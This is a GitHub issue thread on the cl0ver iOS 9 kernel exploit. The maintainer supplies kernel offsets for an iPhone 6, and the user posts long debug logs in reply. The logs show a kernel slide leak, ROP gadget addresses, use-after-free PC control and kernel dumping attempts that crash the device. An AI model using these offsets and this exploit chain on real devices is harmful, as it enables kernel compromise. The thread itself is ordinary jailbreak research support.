Siguza/cl0ver

Unsupported device: iPhone 6 (N61AP) / iOS 9.0 (13A344)

amourification opened this issue · 14 comments

Isn't there any possibility for supporting iPhone 6 (N61AP) on iOS 9.0 with Pangu Jailbreak?

There certainly is, but it's a bit of a stab in the dark. Try this:

  1. Create /etc/cl0ver/config.txt with the following contents:

     0xffffff800454a000
     0xffffff8004503168
    
  2. Download this file, unzip it and place it in /etc/cl0ver/offsets.dat.

  3. Run ./cl0ver and see whether you get an error or a crash.

The iPhone crashed >.<
Now what? :D

This is exactly what I get when I SSH ./cl0ver
The iPhone crashes at the last line

amouriPhone:~ root# ./cl0ver
[*] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[*] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[*] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[*] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[*] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[*] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[*] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[*] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[*] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[*] Releasing user client... [src/lib/io.c:131 _io_release_client]
[*] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 1]: 0xffffff8016d4a000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 3]: 0xffffff81187195cc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 4]: 0xffffff811a89bab4 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 5]: 0xffffff8119eb8800 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 6]: 0xffffff81187195a0 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 7]: 0xffffff800ddeb950 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 8]: 0xffffff80168d4edc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[10]: 0xffffff8016d50a50 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[11]: 0xffffff8118719000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[12]: 0xffffff8016d9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[15]: 0xffffff8016d9e050 [src/lib/slide.c:44 get_kernel_anchor]
[*] Kernel slide: 0x0000000012800000 [src/lib/slide.c:67 get_kernel_slide]
[*] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]
[*] Page size: 0x0000000000001000 [src/lib/uaf_rop.c:113 uaf_rop_stack]
[*] Allocating ROP stack page at 0x000000000c000000 [src/lib/uaf_rop.c:117 uaf_rop_stack]
[*] Allocated ROP page at 0x000000000c000000 [src/lib/uaf_rop.c:123 uaf_rop_stack]
[*] Initializing offsets... [src/lib/offsets.c:248 off_init]
[*] Checking for offsets cache file... [src/lib/offsets.c:261 off_init]
[*] Yes, trying to load offsets from cache... [src/lib/offsets.c:267 off_init]
[*] Successfully loaded offsets from cache, skipping kernel dumping. [src/lib/offsets.c:284 off_init]
[*] Offsets: [src/lib/offsets.c:430 off_init]
[*] gadget_load_x20_x19 = 0xffffff8016808dec [src/lib/offsets.c:431 off_init]
[*] gadget_ldp_x9_add_sp_sp_0x10 = 0xffffff801807cdbc [src/lib/offsets.c:432 off_init]
[*] gadget_ldr_x0_sp_0x20_load_x22_x19 = 0xffffff80168e3880 [src/lib/offsets.c:433 off_init]
[*] gadget_add_x0_x0_x19_load_x20_x19 = 0xffffff80168dd618 [src/lib/offsets.c:434 off_init]
[*] gadget_blr_x20_load_x22_x19 = 0xffffff80175bebc8 [src/lib/offsets.c:435 off_init]
[*] gadget_str_x0_x19_load_x20_x19 = 0xffffff8016829ec0 [src/lib/offsets.c:436 off_init]
[*] gadget_ldr_x0_x21_load_x24_x19 = 0xffffff8016b027b0 [src/lib/offsets.c:437 off_init]
[*] gadget_OSUnserializeXML_return = 0xffffff8016bf69ec [src/lib/offsets.c:438 off_init]
[*] frag_mov_x1_x20_blr_x19 = 0xffffff801682c128 [src/lib/offsets.c:439 off_init]
[*] func_ldr_x0_x0 = 0xffffff8016919810 [src/lib/offsets.c:440 off_init]
[*] func_current_task = 0xffffff8016851b4c [src/lib/offsets.c:441 off_init]
[*] func_ipc_port_copyout_send = 0xffffff801681e728 [src/lib/offsets.c:442 off_init]
[*] func_ipc_port_make_send = 0xffffff801681e67c [src/lib/offsets.c:443 off_init]
[*] data_kernel_task = 0xffffff8016d4a010 [src/lib/offsets.c:444 off_init]
[*] data_realhost_special = 0xffffff8016da83f0 [src/lib/offsets.c:445 off_init]
[*] off_task_itk_self = 0x00000000000000e8 [src/lib/offsets.c:446 off_init]
[*] off_task_itk_space = 0x00000000000002a0 [src/lib/offsets.c:447 off_init]
[*] OSUnserializeXML_stack = 0x0000000000000110 [src/lib/offsets.c:448 off_init]
[*] is_io_service_open_extended_stack = 0x0000000000000120 [src/lib/offsets.c:449 off_init]
[*] Rop chain: 0x000000000c000000-0x000000000c000340 [src/lib/exploit.c:73 get_kernel_task]
[*] Executing ROP chain... [src/lib/uaf_rop.c:131 uaf_rop]
[*] Using UAF to gain PC control... [src/lib/uaf_rop.c:19 uaf_parse]
[*] Data: [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[0]: 0x6fd474c0 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[1]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[2]: 0x00000064 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[3]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[4]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[5]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[6]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
[*] data[7]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
[*] dict_90: [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 0]: 0x000000d3 [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 1]: 0x81000004 [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 2]: 0x08000004 [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 3]: 0x00727473 [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 4]: 0x09000004 [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 5]: 0x00727473 [src/lib/uaf_rop.c:99 uaf_parse]
[*] dict_90[ 6]: 0x0c000001

This is the result of ./cl0ver slide

amouriPhone:~ root# ./cl0ver slide
[*] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[*] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[*] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[*] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[*] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[*] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[*] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[*] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[*] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[*] Releasing user client... [src/lib/io.c:131 _io_release_client]
[*] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 1]: 0xffffff8016d4a000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 3]: 0xffffff81187195cc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 4]: 0xffffff8118b4d2b4 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 5]: 0xffffff811c10b500 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 6]: 0xffffff81187195a0 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 7]: 0xffffff8009143950 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 8]: 0xffffff80168d4edc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[10]: 0xffffff8016d50a50 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[11]: 0xffffff8118719000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[12]: 0xffffff8016d9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[15]: 0xffffff8016d9e050 [src/lib/slide.c:44 get_kernel_anchor]
[*] Kernel slide: 0x0000000012800000 [src/lib/slide.c:67 get_kernel_slide]
[*] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]

Here is the crash report of an earlier ./cl0ver panic attempt:
https://pastebin.com/e7ykVvNq

Try ./cl0ver dump.

It crashes the iPhone as well and no file is dumped anywhere

How soon does it crash? Do you ever get to see Dumping kernel bytes 0x...-0x..., or does it crash before that?

Yeah, Dumping kernel bytes appears then iPhone crashes right after.

amouriPhone:/private/var/root root# ./cl0ver dump
[*] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[*] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[*] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[*] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[*] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[*] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[*] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[*] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[*] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[*] Releasing user client... [src/lib/io.c:131 _io_release_client]
[*] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 1]: 0xffffff801094a000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 3]: 0xffffff8112ee05cc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 4]: 0xffffff81131626b4 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 5]: 0xffffff81149dd300 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 6]: 0xffffff8112ee05a0 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 7]: 0xffffff8169643950 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 8]: 0xffffff80104d4edc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[10]: 0xffffff8010950a50 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[11]: 0xffffff8112ee0000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[12]: 0xffffff801099ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[15]: 0xffffff801099e050 [src/lib/slide.c:44 get_kernel_anchor]
[*] Kernel slide: 0x000000000c400000 [src/lib/slide.c:67 get_kernel_slide]
[*] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]
[*] Dumping kernel to file [src/lib/exploit.c:40 dump_kernel]
[*] Dumping kernel, this will take some time... [src/lib/uaf_read.c:442 uaf_dump_kernel]
[*] Dumping kernel bytes 0xffffff8010404000-0xffffff8010405000... [src/lib/uaf_read.c:288 uaf_read]
[*] Dumping 0xffffff8010404000-0xffffff8010405000... [src/lib/uaf_read.c:334 uaf_read]
[*] Kernel segments: [src/lib/uaf_read.c:467 uaf_dump_kernel]
[*] Mem: 0xffffff8010404000-0xffffff80108f4000 File: 0x0000000000000000-0x00000000004f0000 __TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8010407000-0xffffff801089152c File: 0x0000000000003000-0x000000000048d52c __TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010891540-0xffffff80108b74cc File: 0x000000000048d540-0x00000000004b34cc __TEXT.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80108b74cc-0xffffff80108f3da5 File: 0x00000000004b34cc-0x00000000004efda5 __TEXT.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80108f4000-0xffffff80109b8000 File: 0x00000000004f0000-0x0000000000548000 __DATA [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff80108f4000-0xffffff80108f4208 File: 0x00000000004f0000-0x00000000004f0208 __DATA.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80108f4208-0xffffff80108f4408 File: 0x00000000004f0208-0x00000000004f0408 __DATA.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80108f8000-0xffffff8010915f88 File: 0x00000000004f4000-0x0000000000511f88 __DATA.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010918000-0xffffff8010948018 File: 0x0000000000514000-0x0000000000544018 __DATA.__data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010948018-0xffffff8010949e40 File: 0x0000000000544018-0x0000000000545e40 __DATA.__sysctl_set [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010949e40-0xffffff8010949e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_cnts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010949e40-0xffffff8010949e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010949e40-0xffffff8010949e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_names__DATA [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff801094a000-0xffffff801094b100 File: 0x0000000000000000-0x0000000000001100 __DATA.__common [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff801094c000-0xffffff80109b4eb8 File: 0x0000000000000000-0x0000000000068eb8 __DATA.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109b8000-0xffffff80109bc000 File: 0x0000000000548000-0x000000000054c000 __KLD (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff80109b8000-0xffffff80109b9258 File: 0x0000000000548000-0x0000000000549258 __KLD.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109b9258-0xffffff80109b9960 File: 0x0000000000549258-0x0000000000549960 __KLD.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109b9960-0xffffff80109b99c8 File: 0x0000000000549960-0x00000000005499c8 __KLD.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109b99c8-0xffffff80109b99d0 File: 0x00000000005499c8-0x00000000005499d0 __KLD.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109b99d0-0xffffff80109b99d8 File: 0x00000000005499d0-0x00000000005499d8 __KLD.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109b99d8-0xffffff80109b99d9 File: 0x0000000000000000-0x0000000000000001 __KLD.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109bc000-0xffffff80109c0000 File: 0x000000000054c000-0x0000000000550000 __LAST (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff80109bc000-0xffffff80109bc008 File: 0x000000000054c000-0x000000000054c008 __LAST.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109bc008-0xffffff80109bc008 File: 0x0000000000000000-0x0000000000000000 __LAST.__last [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8010a1c000-0xffffff8011edc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8010a1c000-0xffffff8011edc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109c0000-0xffffff80109c0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff80109c0000-0xffffff80109c0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kernel [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109c0000-0xffffff80109c0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kexts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8011edc000-0xffffff8011f84000 File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8011edc000-0xffffff8011f82d8a File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO.__info [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff80109c0000-0xffffff8010a19280 File: 0x0000000000550000-0x00000000005a9280 __LINKEDIT (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Kernel file size: 0x1a6c000 [src/lib/uaf_read.c:508 uaf_dump_kernel]
[*] Dumping __TEXT... [src/lib/uaf_read.c:528 uaf_dump_kernel]
[*] Dumping kernel bytes 0xffffff8010406000-0xffffff80108f4000... [src/lib/uaf_read.c:288 uaf_read]
[*] Dumping 0xffffff8010406000-0xffffff801040e000... [src/lib/uaf_read.c:334 uaf_read]

This time the dumping went a little farther:

amouriPhone:/private/var/root root# ./cl0ver dump
[*] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[*] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[*] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[*] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[*] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[*] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[*] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[*] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[*] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[*] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[*] Releasing user client... [src/lib/io.c:131 _io_release_client]
[*] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 1]: 0xffffff8009f4a000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 3]: 0xffffff810f24d5cc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 4]: 0xffffff810d7247b4 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 5]: 0xffffff810f72cd00 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 6]: 0xffffff810f24d5a0 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 7]: 0xffffff800946b950 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 8]: 0xffffff8009ad4edc [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[10]: 0xffffff8009f50a50 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[11]: 0xffffff810f24d000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[12]: 0xffffff8009f9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[*] buf[15]: 0xffffff8009f9e050 [src/lib/slide.c:44 get_kernel_anchor]
[*] Kernel slide: 0x0000000005a00000 [src/lib/slide.c:67 get_kernel_slide]
[*] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]
[*] Dumping kernel to file [src/lib/exploit.c:40 dump_kernel]
[*] Dumping kernel, this will take some time... [src/lib/uaf_read.c:442 uaf_dump_kernel]
[*] Dumping kernel bytes 0xffffff8009a04000-0xffffff8009a05000... [src/lib/uaf_read.c:288 uaf_read]
[*] Dumping 0xffffff8009a04000-0xffffff8009a05000... [src/lib/uaf_read.c:334 uaf_read]
[*] Kernel segments: [src/lib/uaf_read.c:467 uaf_dump_kernel]
[*] Mem: 0xffffff8009a04000-0xffffff8009ef4000 File: 0x0000000000000000-0x00000000004f0000 __TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8009a07000-0xffffff8009e9152c File: 0x0000000000003000-0x000000000048d52c __TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009e91540-0xffffff8009eb74cc File: 0x000000000048d540-0x00000000004b34cc __TEXT.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009eb74cc-0xffffff8009ef3da5 File: 0x00000000004b34cc-0x00000000004efda5 __TEXT.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009ef4000-0xffffff8009fb8000 File: 0x00000000004f0000-0x0000000000548000 __DATA [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8009ef4000-0xffffff8009ef4208 File: 0x00000000004f0000-0x00000000004f0208 __DATA.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009ef4208-0xffffff8009ef4408 File: 0x00000000004f0208-0x00000000004f0408 __DATA.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009ef8000-0xffffff8009f15f88 File: 0x00000000004f4000-0x0000000000511f88 __DATA.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f18000-0xffffff8009f48018 File: 0x0000000000514000-0x0000000000544018 __DATA.__data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f48018-0xffffff8009f49e40 File: 0x0000000000544018-0x0000000000545e40 __DATA.__sysctl_set [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f49e40-0xffffff8009f49e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_cnts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f49e40-0xffffff8009f49e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f49e40-0xffffff8009f49e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_names__DATA [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f4a000-0xffffff8009f4b100 File: 0x0000000000000000-0x0000000000001100 __DATA.__common [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009f4c000-0xffffff8009fb4eb8 File: 0x0000000000000000-0x0000000000068eb8 __DATA.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb8000-0xffffff8009fbc000 File: 0x0000000000548000-0x000000000054c000 __KLD (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb8000-0xffffff8009fb9258 File: 0x0000000000548000-0x0000000000549258 __KLD.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb9258-0xffffff8009fb9960 File: 0x0000000000549258-0x0000000000549960 __KLD.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb9960-0xffffff8009fb99c8 File: 0x0000000000549960-0x00000000005499c8 __KLD.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb99c8-0xffffff8009fb99d0 File: 0x00000000005499c8-0x00000000005499d0 __KLD.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb99d0-0xffffff8009fb99d8 File: 0x00000000005499d0-0x00000000005499d8 __KLD.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fb99d8-0xffffff8009fb99d9 File: 0x0000000000000000-0x0000000000000001 __KLD.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fbc000-0xffffff8009fc0000 File: 0x000000000054c000-0x0000000000550000 __LAST (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff8009fbc000-0xffffff8009fbc008 File: 0x000000000054c000-0x000000000054c008 __LAST.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff8009fbc008-0xffffff8009fbc008 File: 0x0000000000000000-0x0000000000000000 __LAST.__last [src/lib/uaf_read.c:500 uaf_dump_kernel]
[*] Mem: 0xffffff800a01c000-0xffffff800b4dc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[*] Mem: 0xffffff800a01c000-0xffffff800b4dc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
